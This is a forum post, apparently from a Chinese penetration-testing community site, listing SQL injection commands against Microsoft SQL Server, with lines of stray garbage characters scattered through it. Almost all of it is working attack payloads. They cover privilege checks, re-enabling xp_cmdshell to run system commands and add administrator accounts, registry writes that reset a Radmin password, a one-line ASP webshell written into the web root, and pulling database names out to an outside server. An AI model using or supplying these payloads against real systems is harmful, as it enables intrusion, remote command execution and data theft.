中国网络渗透测试联盟
标题:
常用的一些注入命令
[打印本页]
作者:
admin
时间:
2012-9-15 14:40
标题:
常用的一些注入命令
//看看是什么权限的
1 Q" |: B" H. t+ y# I
and 1=(Select IS_MEMBER('db_owner'))
/ c3 t5 {5 I4 ?0 Z7 z/ ~
And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--
" b& p" ]; C; K& w- Y1 S
& n) J2 D& g) A) n' a) d! ? o
//检测是否有读取某数据库的权限
7 q, s" ~0 c7 ~
and 1= (Select HAS_DBACCESS('master'))
8 x1 N& ~& j1 o; L0 f, O4 s
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --
0 U) |' O5 Q, q) Y
! ?4 s, h7 s% L; S/ r
" n k, C9 G0 g; h# c- U9 u
数字类型
6 Q6 C8 s% R7 k% i! `! v; p
and char(124)%2Buser%2Bchar(124)=0
# s9 _$ {9 ?! B3 @/ I' s% K
( p; B ~. x9 I: D8 @/ X, o2 a
字符类型
9 C1 C$ Y. n! F/ x$ r
' and char(124)%2Buser%2Bchar(124)=0 and ''='
- [5 H5 N- a2 C7 o3 o) \
5 {. r) Q8 `. s3 \/ X
搜索类型
, |: w1 q; O4 j
' and char(124)%2Buser%2Bchar(124)=0 and '%'='
3 i5 `8 s7 W8 R
# T. c9 d$ B: V
爆用户名
: S" W5 s$ [3 X) U- A& G$ M B3 ]
and user>0
( [3 G6 @9 ]' `
' and user>0 and ''='
! u" B% o6 `$ V1 ~. T6 J$ ]
, i6 M5 o/ D5 Y) o# p: S$ R
检测是否为SA权限
8 v, L- V2 \# J, @) } e+ y& L
and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
l) V- ]$ {6 L! i. y
And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --
- p9 \. v3 x* C8 o) Q/ G% ^) H: C
, O. r4 _" B/ u# \, @. ~
检测是不是MSSQL数据库
( a1 Y6 M) ?. I$ o1 v5 h
and exists (select * from sysobjects);--
2 P7 }' A0 }8 G8 j- L' y$ E
1 M+ R2 P& Y9 l
检测是否支持多行
5 ~* ^6 L' L o- y0 _
;declare @d int;--
* r. q' e4 N9 _, d" `
7 n% k" e9 d% v N/ P, `
恢复 xp_cmdshell
" d& N. X1 I( D! t" v, A' ~
;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--
! t* j! L9 G# K7 h$ ^
4 v' d; m" G% n
8 F; o% O, D5 k
select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')
6 }- v) S5 E9 `8 Z+ u* K
! }9 i, c2 T& s! k* I/ P
//-----------------------
; K' G1 s$ Q" N" x1 k d. H, X! b
// 执行命令
1 y0 p6 a& ?+ k/ ~ L: V
//-----------------------
1 T, d3 U8 `' e. z
首先开启沙盘模式:
, l/ Y+ {. s/ U5 {! F$ U
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
# J3 D' o, ` [& M5 ~
! v6 m0 @; P+ S2 s2 U. t: v
然后利用jet.oledb执行系统命令
7 T; Z0 b8 I! K6 ~2 U8 w
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
5 m. y. q+ h2 G4 F
5 u' o% `1 F* u. O0 @' `8 U
执行命令
9 ^( f# g( B4 z
;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--
5 W/ L7 j. o7 `* l' D
* w- @& D ?8 R# }! C6 |4 j
EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'
/ n$ G4 t6 d7 W
3 s7 ?/ T- f& L& R: `8 M1 w
判断xp_cmdshell扩展存储过程是否存在:
( }" r3 Q! P- B& f9 U2 j8 l5 y; D9 R
http://192.168.1.5/display.asp?keyno=188
and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')
3 Q! O5 P- Y* m3 _
N( z9 h* v+ ~+ }4 s+ e
写注册表
/ Q8 k1 T9 m9 I0 V, Y# ^
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
! p7 Y$ e6 V+ P, h
' u! H! J4 J" t% Y
REG_SZ
^; \1 s3 |) G+ j1 I6 p$ k
, ^7 V8 d+ i2 g! h7 |; f
读注册表
9 n: y8 l) p9 `# }% |( E
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'
: a, v: K/ f3 A8 N, J0 i
# O; @% U+ S5 F% A. T% s1 o
读取目录内容
# x% Z& f8 w: h7 |% Y
exec master..xp_dirtree 'c:\winnt\system32\',1,1
) s6 B0 [' [0 i0 ]# G
+ x7 e" \7 p: Y, H9 A% {& Y2 q, O- K. a
! g+ o) ^0 w, g' ]* y0 Z
数据库备份
/ z6 W7 J% x7 t! L
backup database pubs to disk = 'c:\123.bak'
7 l' u2 K) `4 I+ |, o* @+ q/ [
% f# l; T0 T. F! |3 ^% T' d
//爆出长度
& h X" B" ^; U$ i; r" U* ^4 U
And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--
& R v' X3 S$ k( D0 M$ l' P
: H k4 t2 R8 `/ X# U
+ y- Q) i. n( _* u9 E
) G, [2 t. y, d8 v; _3 {) u
更改sa口令方法:用sql综合利用工具连接后,执行命令:
' H) I1 X; S9 T0 `' z6 B* ~
exec sp_password NULL,'新密码','sa'
0 R: D2 }& A2 ~4 P, M# T
1 X1 \9 H9 w6 w6 M2 k7 y
添加和删除一个SA权限的用户test:
: r8 `0 c0 L9 ~: i; J0 B& v
exec master.dbo.sp_addlogin test,9530772
3 F& ^8 Y, V: v+ L+ c' \
exec master.dbo.sp_addsrvrolemember test,sysadmin
# @# j* D2 B* g: b' ^* X z
5 Z) y0 ]( d) Q" _
删除扩展存储过过程xp_cmdshell的语句:
" k5 @2 K. M, R& G. h F
exec sp_dropextendedproc 'xp_cmdshell'
0 g4 n0 L( R L
6 S7 W2 X9 Y7 B% A( S+ _
添加扩展存储过过程
. ?5 T( N0 g) X( Q% W
EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'
0 X6 `3 }- v# U2 f0 _+ x7 J
GRANT exec On xp_proxiedadata TO public
& T" S* b: M' y
6 z3 Z2 J. T" ~
" H1 {2 i8 T& N' U4 s
停掉或激活某个服务。
* ^0 ]0 p: ^4 s* m3 ?( W
8 @3 t; \$ [+ h8 H; W( C* u
exec master..xp_servicecontrol 'stop','schedule'
5 q' i; w. i; _4 \7 g- ^
exec master..xp_servicecontrol 'start','schedule'
: P' h- s. t9 A \
( p( ~8 s( b* u3 H
dbo.xp_subdirs
9 V- K: e) M# w0 U$ d
+ c$ B' X1 c4 z/ m5 d( f! m
只列某个目录下的子目录。
* R; n5 ]. e0 @- v( e1 {* w
xp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'
" m: E' ~3 p5 F7 i: H, Q, d, _! ?
( h9 B& [' B9 [/ X2 [; B2 @- K
dbo.xp_makecab
9 B; r0 ?3 E5 ^( e% ^; i
' \7 M1 s: y- A
将目标多个档案压缩到某个目标档案之内。
2 o, j' B2 G1 \, W: t
所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。
! d$ x. h! }% B' v$ C; {+ W& D" L
, S4 J) |" ^9 R& ^2 C
dbo.xp_makecab
5 c5 h d1 Q9 l0 [5 {* C% `% \
'c:\test.cab','mszip',1,
% h5 N+ b7 r9 {1 I1 L: a7 j
'C:\Inetpub\wwwroot\SQLInject\login.asp',
, A/ I' h6 C9 s" S* Y5 Z: G
'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'
9 o" Z3 [# C$ \. L- H6 I* }
, c. G# V; \0 l0 e
xp_terminate_process
* e2 M4 h0 y/ m7 s) J! J. E V
( z( Z9 a; w$ c; C
停掉某个执行中的程序,但赋予的参数是 Process ID。
% N+ r# a. h* K" z1 y+ n
利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID
|; ?1 j' M9 A
& _# ~- T: y9 X- @: I
xp_terminate_process 2484
7 F' ~0 W' J; J! q
4 r9 i0 C- I7 s/ l
xp_unpackcab
+ _' Z9 z. X3 L8 T& |7 d- i: C9 x
' q5 C/ f1 F% l. [$ ?9 h [
解开压缩档。
& [; M/ I- C j& T
1 X4 \$ A7 ?; L6 _ _
xp_unpackcab 'c:\test.cab','c:\temp',1
5 Z" n6 Y! G8 L
; X) P1 c- ]4 U" b" B+ t5 R
* ?8 L$ k9 U$ a& u) z5 ~ f
某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234
3 e9 O7 G) X' _( s% D+ \, E
5 s2 |. v8 U% n- Y2 W- y
create database lcx;
4 L/ K5 j" V" u: f
Create TABLE ku(name nvarchar(256) null);
4 b, i. A% C3 s- p" o
Create TABLE biao(id int NULL,name nvarchar(256) null);
6 @7 ^8 Z: d5 i8 v* b* k( ~. o
1 E6 c2 ]. W7 ? q+ O
//得到数据库名
" D$ o7 t7 X x6 j
insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases
# F2 D: F3 C. F
8 P4 A9 O; A9 F- H2 j; w( g5 C8 Y
& |2 D. S& ?. S. K" a
//在Master中创建表,看看权限怎样
8 d' F q& Z/ o% X+ G* v: T
Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--
6 n1 a" }3 E" J/ b( m
3 I3 Y3 G3 V1 [5 @
用 sp_makewebtask直接在web目录里写入一句话马:
' J) ^/ s- |2 l D
http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:
\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--
" G. P T) H1 M! l2 p f, x
5 ~" S$ E% [" M% j! Q+ D
//更新表内容
) v# Z0 c; i& i: o- Y5 r
Update films SET kind = 'Dramatic' Where id = 123
( E7 n* F$ e0 z# W* c7 g
6 Q/ c! _. v* W$ T0 y, G0 P
//删除内容
6 v6 `% N3 S8 t* u
delete from table_name where Stockid = 3
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2